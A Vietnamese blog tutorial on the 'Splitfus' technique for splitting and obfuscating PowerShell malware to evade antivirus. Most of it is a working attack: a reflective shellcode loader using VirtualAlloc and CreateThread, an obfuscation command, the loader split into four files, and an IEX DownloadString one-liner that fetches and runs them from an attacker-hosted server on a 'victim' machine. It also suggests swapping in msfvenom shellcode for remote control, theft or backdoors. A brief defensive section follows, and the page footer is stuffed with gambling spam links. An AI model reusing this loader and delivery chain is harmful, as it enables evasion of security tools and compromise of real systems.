• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell

Hevin by Hevin
in Virus-Trojan-Rat
A A
0

Mục lục bài viết

  1. Cách phòng thủ trước kỹ thuật Splitfus
    1.  Tăng cường giám sát PowerShell
    2. Kích hoạt và bảo vệ AMSI (Antimalware Scan Interface)
    3. Kiểm tra hành vi tải động trong hệ thống
    4. Thiết lập kiểm soát truy cập mạng chặt chẽ

Hiện nay, các hệ thống phòng thủ như Antivirus (AV) và Endpoint Detection & Response (EDR) ngày càng mạnh mẽ. Tuy nhiên, các nhóm hacker vẫn liên tục sáng tạo những kỹ thuật tinh vi để vượt qua lớp bảo vệ này. Một trong những kỹ thuật phổ biến đó là Splitfus. Đây là phương pháp chia nhỏ mã độc PowerShell và làm rối code (obfuscate), sau đó thực thi từng phần theo nhiều giai đoạn (staged delivery). Vậy vì sao kỹ thuật này lại hiệu quả đến vậy? Hãy cùng mình đi tìm hiểu nhé !

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Splitfus là gì ?

Splitfus (viết tắt của Split + Obfuscation) là kỹ thuật mà hacker sử dụng để:

Các bài viết liên quan

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 6

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025
6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus 7

6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus

25/08/2023
Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén 8

Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén

19/08/2023
Hide Malware In Image

Hacker ẩn Malware vào hình ảnh và thực thi như thế nào ?

05/08/2023
  • Chia nhỏ (split) mã độc PowerShell thành nhiều đoạn, ví dụ: malware1.ps1, malware2.ps1, malware3.ps1,…
  • Làm rối (obfuscate) từng đoạn mã để tránh bị phân tích hoặc phát hiện bởi chữ ký của AV
  • Thực thi theo nhiều giai đoạn (staged execution): Khi thực hiện tấn công, máy nạn nhân sẽ tải từng đoạn mã từ máy chủ hacker và chạy trực tiếp trong bộ nhớ, thay vì lưu toàn bộ payload trên đĩa. Đây là kiểu thực thường được biết đến với tên gọi multi-stage attack hoặc fileless malware

Tại sao Splitfus hiệu quả trong việc vượt qua Antivirus ?

  • Giảm khả năng bị phát hiện theo chữ ký (signature-based detection)
  • AV truyền thống dựa vào chữ ký hoặc mẫu mã độc. Khi mã độc được chia nhỏ và mã hóa, không có đoạn nào chứa toàn bộ payload, khiến việc phát hiện trở nên khó khăn
  • Tránh quét tĩnh và sandbox
    • Nếu toàn bộ payload nằm trong một file, AV dễ dàng phân tích trước khi chạy
    • Với Splitfus, mã độc được tải động (on-demand) từ máy chủ hacker, nên môi trường sandbox khó tái hiện được toàn bộ quy trình
  • Bypass AMSI (Antimalware Scan Interface)
  • AMSI của Windows có khả năng quét nội dung PowerShell trước khi thực thi. Tuy nhiên, với Splitfus:
    • Các đoạn mã nhỏ, obfuscated và tải động → khó bị AMSI phân tích đầy đủ
    • Nhiều hacker còn kết hợp AMSI bypass với Splitfus để tăng hiệu quả
  • Linh hoạt và dễ cập nhật
  • Hacker có thể thay đổi một đoạn bất kỳ trên máy chủ mà không cần phát tán lại toàn bộ payload. Điều này khiến việc truy vết hoặc phát triển chữ ký AV trở nên khó hơn

Phần lý thuyết đơn giản ngắn gọn vậy thôi, bây giờ mình sẽ lấy ví dụ thực tế cho bạn dễ hình dung hơn cách kỹ thuật được thực hiện

Ví dụ thực tế

Nhiều chiến dịch tấn công APT và malware framework như Cobalt Strike, PowerShell Empire, Metasploit đã áp dụng cơ chế tương tự Splitfus để phát tán payload staged. Đây là xu hướng phổ biến trong các cuộc tấn công fileless hiện nay.

Xem thêm:  Cảnh giác thủ đoạn đính kèm Virus vào File Word mới nhất 2022

Được rồi, bây giờ cùng mình thử chạy 1 đoạn code Powershell sau: Write-Host “Invoke-Mimikatz” . Ồ bạn thấy đấy, Antivirus đã phát hiện và chặn đoạn mã này. Đây là chỉ 1 đoạn mã in ra chuỗi trên terminal mà tại sao lại bị chặn nhỉ ? Bởi vì nó chứa chuỗi ký tự “Invoke-Mimikatz”. Đây là một chữ ký (signature) cực kỳ nổi tiếng và đặc trưng của công cụ tấn công Mimikatz

Screenshot 2025-07-18 221618.png

Như vậy, các AV được cấu hình để chặn ngay lập tức bất kỳ đoạn mã nào chứa chữ ký nguy hiểm này, ngay cả ở giai đoạn sớm nhất, nhằm ngăn chặn mọi ý đồ tiềm tàng liên quan đến Mimikatz. Đây là một biện pháp phòng ngừa rủi ro.

Vậy là chúng ta đã biết cách AV được cấu hình, giờ hãy thử tách chuỗi “Invoke-Mimikatz” thành nhiều chuỗi ngắn khác nhau.

Screenshot 2025-07-18 221712.png

Như bạn thấy, dù tách chuỗi thành các phần nhỏ như “Invo”, “ke”, “-Mim”, “ikatz”, AV vẫn không phát hiện ra đoạn mã độc. Sau đó, khi chúng ta nối lại các chuỗi này trong quá trình thực thi kết quả vẫn là “Invoke-Mimikatz” nhưng đã vượt qua được hệ thống phát hiện của AV. Đây chính là ví dụ đơn giản nhất của kỹ thuật Splitfus

Bây giờ chúng ta cùng xem 1 ví dụ khai thác thực tế hơn với đoạn code Powershell sau, với file tên là sc-original.ps1

[Byte[]] $shellcode = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)

function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp = $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$handle = $assem.GetMethod('GetModuleHandle').Invoke($null, @($moduleName));
[IntPtr] $result = 0;
try {
Write-Host "First Invoke - $moduleName $functionName";
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}catch {
Write-Host "Second Invoke - $moduleName $functionName";
$handle = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $handle);
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}
return $result;
}

function getDelegateType {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])
$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}

$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $lpMem, $shellcode.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)

Đây là đoạn mã Powershell thực thi Shellcode của calc.exe trên Windows, nếu chúng ta thực thi toàn bộ đoạn mã này thì sẽ bị AV chặn. Và lúc này mình sẽ áp dụng kĩ thuật Splitfus. Trước tiên mình sẽ sử dụng công cụ Chimera để xáo trộn đoạn mã này trở nên khó đọc hơn với câu lệnh sau

./chimera.sh -f sc-original.ps1 -l 3 -v -t -s -b -j -o sc-obf.ps1

Screenshot 2025-07-19 121306.png

Giờ đây, đoạn mã Powershell ban đầu đã được làm rối bằng cách thay đổi biến. Tiếp theo, mình sẽ chia tệp này thành nhiều phần nhỏ hơn để thực thi một cách rời rạc, khiến hệ thống bảo mật không thể phát hiện ra chữ ký đặc trưng của shellcode

Xem thêm:  Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

Tiếp theo, mình chia tệp sc-obf.ps1 thành 4 tệp riêng biệt: sc1.ps1 ( chứa biến lưu trữ Shellcode ), sc2.ps1 ( chứa hàm LookupFunc đã làm rối ), sc3.ps1 ( chứa hàm getDelegateType đã làm rối ) và sc4.ps1 ( chứa 3 dòng code cuối cùng ). Mỗi phần này nếu bị quét riêng lẻ sẽ không gây cảnh báo từ AV. Đây là đoạn code đã xáo trộn và tách ra riêng biệt từng file như mình nói

#sc1.ps1
[Byte[]] $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)
#sc2.ps1
function iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs {
Param ($JzGCXcYJmJdQKoCerSqNXT, $LaHgzlZeSdXkwSwksNKHLbDEymlFp)
$FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$jWwCsHjXRPShPEyyEBpzOw = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$aFUfleAnufbxjgylCpxMoZnlpUkts = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethod('GetModuleHandle').Invoke($null, @($JzGCXcYJmJdQKoCerSqNXT));
[IntPtr] $XHcKpPqwXEaSejzfchayBW = 0;
try {
Write-Host "First Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}catch {
Write-Host "Second Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$aFUfleAnufbxjgylCpxMoZnlpUkts = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $aFUfleAnufbxjgylCpxMoZnlpUkts);
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}
return $XHcKpPqwXEaSejzfchayBW;
}

 

#sc3.ps1
function DdKSsQGFmFfVhpHEtVzHaZFCWQGs {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $GVUAdTXmnEpoFzPorhRfka,[Parameter(Position = 1)] [Type] $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB = [Void])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
return $YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.CreateType()
}

 

#sc4.ps1
$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll VirtualAlloc),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe, 0, $WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll CreateThread),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH,[IntPtr]::Zero,0,[IntPtr]::Zero)

Các bước để thực hiện kĩ thuật Splitfus này cũng rất đơn giản. Đầu tiên, mình sử dụng lệnh sau để khởi tạo server Python trên cổng 80 với địa chỉ IP là 192.168.1.17:

python3 -m http.server 80

Server này sẽ lưu các file script PowerShell đã tách nhỏ và làm rối, cho phép máy nạn nhân tải xuống từng phần riêng biệt.

Cuối cùng mình tạo 1 đoạn lệnh thực thi ngắn gọn để thực thi trên máy nạn nhân

1..4 | ForEach-Object { IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.1.17/sc$_.ps1") }

Lệnh này sẽ tải xuống và thực thi từng file script từ sc1.ps1 đến sc4.ps1. Đây là cách hiệu quả để vượt qua các cơ chế phát hiện mã độc vì mỗi phần riêng lẻ có thể trông vô hại. Khi kết hợp lại, chúng tạo thành một cuộc tấn công hoàn chỉnh mà nhiều giải pháp bảo mật không thể phát hiện

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell 5

Với Metasploit, việc tạo shellcode trở nên dễ dàng hơn rất nhiều. Mình sẽ sử dụng lệnh msfvenom để tạo ra shellcode mới, sau đó thay thế vào script sc1.ps1. Điều này cho phép mình tùy biến cuộc tấn công theo nhiều hướng khác nhau, từ lấy quyền điều khiển máy tính nạn nhân đến đánh cắp thông tin hoặc cài đặt backdoor

https://streamable.com/rwoo4k

Và đó là những ví dụ đơn giản, nhưng thực tế, mã độc PowerShell không hề đơn giản như vậy. Các hacker sẽ phải dùng thêm kĩ thuật Bypass AMSI để tăng tỉ lệ thành công

Xem thêm:  Hướng dẫn tự viết Virus đơn giản bằng Python

Cách phòng thủ trước kỹ thuật Splitfus

Kỹ thuật Splitfus là một trong những phương pháp tấn công bằng PowerShell tinh vi, khó phát hiện nếu hệ thống không được giám sát chặt chẽ. Để phòng thủ hiệu quả trước Splitfus, đội ngũ an ninh mạng cần triển khai đồng bộ nhiều biện pháp chủ động, từ việc giám sát hành vi cho đến xây dựng hệ thống cảnh báo sớm và đào tạo người dùng cuối.

 Tăng cường giám sát PowerShell

PowerShell là công cụ thường bị lạm dụng trong các cuộc tấn công hiện đại. Để theo dõi hoạt động bất thường, hệ thống cần bật tính năng ghi nhật ký Script Block Logging (sử dụng Event ID 4104) kết hợp với Module Logging. Những thiết lập này giúp lưu lại toàn bộ lệnh PowerShell đã được thực thi, kể cả khi đã bị làm rối mã (obfuscate). Ngoài ra, nên kích hoạt chế độ Constrained Language Mode để hạn chế việc sử dụng các lệnh nguy hiểm trong môi trường thực thi PowerShell.

Kích hoạt và bảo vệ AMSI (Antimalware Scan Interface)

AMSI là lớp phòng vệ quan trọng giúp phân tích mã trước khi được thực thi trong PowerShell. Việc đảm bảo AMSI luôn được bật và không bị vượt qua (bypass) là điều thiết yếu. Khi tích hợp cùng Microsoft Defender hoặc các giải pháp EDR có hỗ trợ quét AMSI, khả năng phát hiện mã độc bị làm rối sẽ được nâng cao rõ rệt, giúp ngăn chặn sớm các hành vi tấn công từ Splitfus.

Kiểm tra hành vi tải động trong hệ thống

Một đặc điểm thường thấy của Splitfus là sử dụng các tham số nguy hiểm trong PowerShell như EncodedCommand hoặc gọi hàm IEX để tải mã từ xa thông qua chuỗi như (New-Object Net.WebClient).DownloadString. Hệ thống EDR hoặc HIDS cần được cấu hình để nhận diện những hành vi này. Đồng thời, cần cảnh giác khi phát hiện script được tải về từ domain không đáng tin cậy, đặc biệt là các yêu cầu HTTP GET chứa tập tin đuôi .ps1.

Thiết lập kiểm soát truy cập mạng chặt chẽ

Kiểm soát truy cập mạng đóng vai trò quan trọng trong việc ngăn chặn Splitfus giao tiếp với máy chủ điều khiển (C2 server). Cần chủ động chặn các kết nối outbound đến địa chỉ IP hoặc domain nghi ngờ. Việc cấu hình proxy kết hợp với kiểm tra TLS (TLS inspection) sẽ giúp phát hiện các hành vi tải mã ẩn dưới kết nối được mã hóa. Bên cạnh đó, cập nhật liên tục các chỉ số tấn công (IOC) từ nguồn Threat Intelligence Feed sẽ nâng cao khả năng nhận diện và phản ứng kịp thời.

Cuối cùng, yếu tố con người luôn là mắt xích yếu nhất trong chuỗi phòng thủ. Việc tuyên truyền và đào tạo người dùng cuối nhằm nâng cao nhận thức bảo mật là điều bắt buộc. Nhân viên cần được hướng dẫn không chạy script từ các nguồn không rõ ràng. Đồng thời, kỹ năng nhận diện email giả mạo (phishing) cũng cần được chú trọng vì đây thường là điểm xuất phát của các cuộc tấn công Splitfus.

Tags: mã độcSplitfusvirus
Hevin

Hevin

Related Posts

cach lay certificate phan mem khac
Virus-Trojan-Rat

Cấy Certificate từ App khác vào Virus để Bypass AV

08/01/2023
Cách tạo Backdoor đơn giản với CMD 9
Virus-Trojan-Rat

Cách tạo Backdoor đơn giản với CMD

06/01/2023
AnonyvietTrojan v1.2 - Update cho Linux OS và chức năng đính kèm virus 10
Virus-Trojan-Rat

AnonyvietTrojan v1.2 – Update cho Linux OS và chức năng đính kèm virus

04/12/2022 - Updated on 11/12/2022
Villain - Bypass AntiVirus chiếm quyền Shell Windows và Linux 11
Virus-Trojan-Rat

Villain – Bypass AntiVirus chiếm quyền Shell Windows và Linux

26/11/2022
AT v1.1 - Update chức năng mã hóa RAT vượt qua Windows Defender
Virus-Trojan-Rat

AnonyvietTrojan v1.1 – Update mã hóa RAT vượt qua Windows Defender

04/11/2022
AnonyvietTrojan - Công cụ giúp Virus vượt qua Windows Defender
Virus-Trojan-Rat

AnonyvietTrojan – Công cụ giúp Virus vượt qua Windows Defender

22/09/2022 - Updated on 03/12/2022
Subscribe
Notify of
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
oldest
newest
Inline Feedbacks
View all comments

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell 15

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell

by Hevin
20/07/2025
0

Cách check in máy bay trên VNeID, tạm biệt cảnh chờ đợi mệt mỏi 16

Cách check in máy bay trên VNeID, tạm biệt cảnh chờ đợi mệt mỏi

by Thanh Kim
20/07/2025
0

Danh sách các khu vực cấm xe xăng tại Hà Nội và TP.HCM 17

Danh sách các khu vực cấm xe xăng tại Hà Nội và TP.HCM

by Thanh Kim
19/07/2025
0

Cách dùng Veo 3 tạo video từ ảnh tĩnh chỉ trong vài giây 18

Cách dùng Veo 3 tạo video từ ảnh tĩnh chỉ trong vài giây

by Thanh Kim
19/07/2025
0

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

Bình luận gần đây

  • thông cảm trong Cách nhận License Key Driver Booster Pro 12 6 tháng miễn phí
  • Sy Ne trong Cách nhận License Key Driver Booster Pro 12 6 tháng miễn phí
  • AnonyViet trong Hướng dẫn download Ebook Amazon miễn phí không tốn một xu
  • Kim trong Hướng dẫn download Ebook Amazon miễn phí không tốn một xu
  • NAY Y THIET trong Black Tool – Phần mềm tổng hợp Tool Hack kinh khủng nhất
  • Wacky Flip trong Cách tạo game đua vịt Duck Race gọi trả bài cực vui nhộn
  • bảo trong Download VMware Workstation Pro 17.5 Full Key Serial
  • AnonyViet trong Tự động dọn dẹp máy tính dễ dàng với BleachBit
  • Ly Yong trong Tự động dọn dẹp máy tính dễ dàng với BleachBit
  • AnonyViet trong Hướng dẫn tự tạo SOCKS5 trên Ubuntu
  • Quốc Anh trong Hướng dẫn tự tạo SOCKS5 trên Ubuntu
  • phuong trong KTimer: Lên lịch tắt máy, ngủ đông dễ dàng cho người bận rộn
  • sagar trong Cách khai thác lỗ hổng DLL Hijacking trên Windows
  • nikolai trong Hướng dẫn Hack Camera Điện thoại bằng cách gửi Link Website
  • AI Question Generator trong Hướng dẫn Việt hóa GTA 5 tải từ EPIC để chơi bằng tiếng Việt
  • Stiff trong Cách tạo MTProto Proxy riêng để dùng Telegram khi bị chặn
  • AnonyViet trong Học miễn phí khóa học Phổ cập AI và nhận chứng chỉ từ Trung ương Đoàn
  • Quốc trong Học miễn phí khóa học Phổ cập AI và nhận chứng chỉ từ Trung ương Đoàn
  • AnonyViet trong Cách tạo MTProto Proxy riêng để dùng Telegram khi bị chặn
  • Tienban trong Cách tạo MTProto Proxy riêng để dùng Telegram khi bị chặn

©2025 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ Danh mục kết quả xổ số hôm nay trực tiếp bóng đá xoilac colatv truc tiep bong da trang chủ hi88 trang chủ hi88 KUBET xoilac nhà cái 8xbet Kubet bong88 https://cwfun.org/ https://hi88.gives/ 33win 789win ww88 kubet https://thabet-vn.com/ Ae888 kubet 789Club 188BET 188BET Link https://789club10.pro kubet 188bet 8kbet pg88 99ok xin88 good88 https://www.chantalsutherlandjockey.com/ Sun win https://www.go88vn.uk.com/ https://www.rik-vip.uk.com/ kubet w88 32WIN RR88 cakhiatv Thapcam TV https://78win.id/ Game bài đổi thưởng https://33winlink.live/ hi88 https://78win.dental/ f8bet k8cc https://qq883a.com/ Leo88 Leo88 nha cai uy tin mu88 casino Vebo TV https://v9betnet.com/ https://ee88vie.com/ max88 manclub iwin 79king ww88 SV388 69VN Zomclub https://hi88fz.com/ https://u888.one/ ABC8 https://go886.org/ https://sunwin10.org/ https://789club10.life/ Jun88 https://jun88pro.org/ 77Bet HB88 123b https://33winvn.me/ Tha bet hello88 188bet kubet11 k8cc f168 luckywin fm88 https://horse.uk.com https://xin88.de.com/ SH BET https://918xxy.com/ 58WIN https://77betvn.me/ https://hb88vn.live/ kubet thailand 789club tài xỉu online uy tín Game bài đổi thưởng uy tín https://www.newfacespac.com/ vip66 xoso66 789 BET vip66 xoso66 luckywin https://tp88fun.com/ trang chủ hi88 daga nhacaiuytin f8bet hello88 qq88 Luckywin NH88 https://abc8.furniture/ leo88 hb88 77bet jun88.info https://jbo.center/ 88aa 88aa https://789p.express/ Kuwin GK88 kubet fb68 https://bk8z.com.co/ 79king 789p PG88 SV388 F168 SV388 PG88 https://ok9.today/ Xoso66 Vip66 ABC8 hitclub Wi88 HB88 HB88 https://j88ss.com/ https://789wincom.me/ https://hubett2.org/ bong99 https://nohu90phut.com/ bet88 Ga6789 Daga Link https://88clbus.com/ https://u888rse.com/ XOSO66 b52 club iwin new882.info Hi88 8day Thabet 33win Bk8 fun88 789win w88 nhà cái uy tín Go88 sunwin sunwin sunwin jun88 bk8 rikvip hitclub sunwin go88 98win 789bet m88 s666 sv388 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 78win abc8 c54 new88 i9bet ok365 ae888 https://keonhacai.fund/ kèo nhà cái 5 https://keobongda.de.com/ nha cai uy tin https://max886.org/ sunwin 32win NH88 game bài đổi thưởng 33win com 789BET Luck8 https://tk88678.com/ https://ok9393.com/ 69VN 69VN 69VN 69VN max88 net88 soc88 qq88 com PG88 F168 https://king88aff.com/ F168 58WIN uu88 https://okking.uk/ alo789 sv368 sv388 dagatructiep 99ok 88vn F168 23win 78win 88clb 18win 79KING SV66 RR88 daga HB88 Tk88 qq88 okking BL555 BL555 rr88 hello88 https://rikbet.team/ https://alo789.rocks/ https://ok365.jpn.com/ https://v9beti.com/ https://23win.codes/ https://58win.digital/ 68win nhà cái uy tín https://qh88.cymru https://qh88.casa https://m88club.biz https://m88vinvn.com https://79kinggod.club https://79kingvn.xyz https://kubet29.vip https://kubet79.top https://w88linkb.com https://188betlinkb.com https://188betlinka.com https://e2beting.com/ 69vn TD88 xoilac cakhiatv socolive QQ88 TP88 69vn King88 zowin 8kbet https://23win.kim/ pg99 https://new88.market/ f8bet E2bet 98WIN daga88 32WIN.SALE hi 88 U888 nohu90 http://9bet.faith/ https://8kbettt.co/ King88 King88 88i https://nohu90ab.com/ kubet https://king886.co/ 69VN 79king 32win 32win F168 bet88 Xoso66 Luong Son TV daga 6789 6789 32win https://9ae888.com/ https://23win.men/ xoso66 u888 rr88 79king pg88 s666 fb88 ww88 9bet 7ff https://bubet.com/ https://bin88.com/ BET88 https://new88.land/ f168 88vv https://1goal123.com/ i9bet 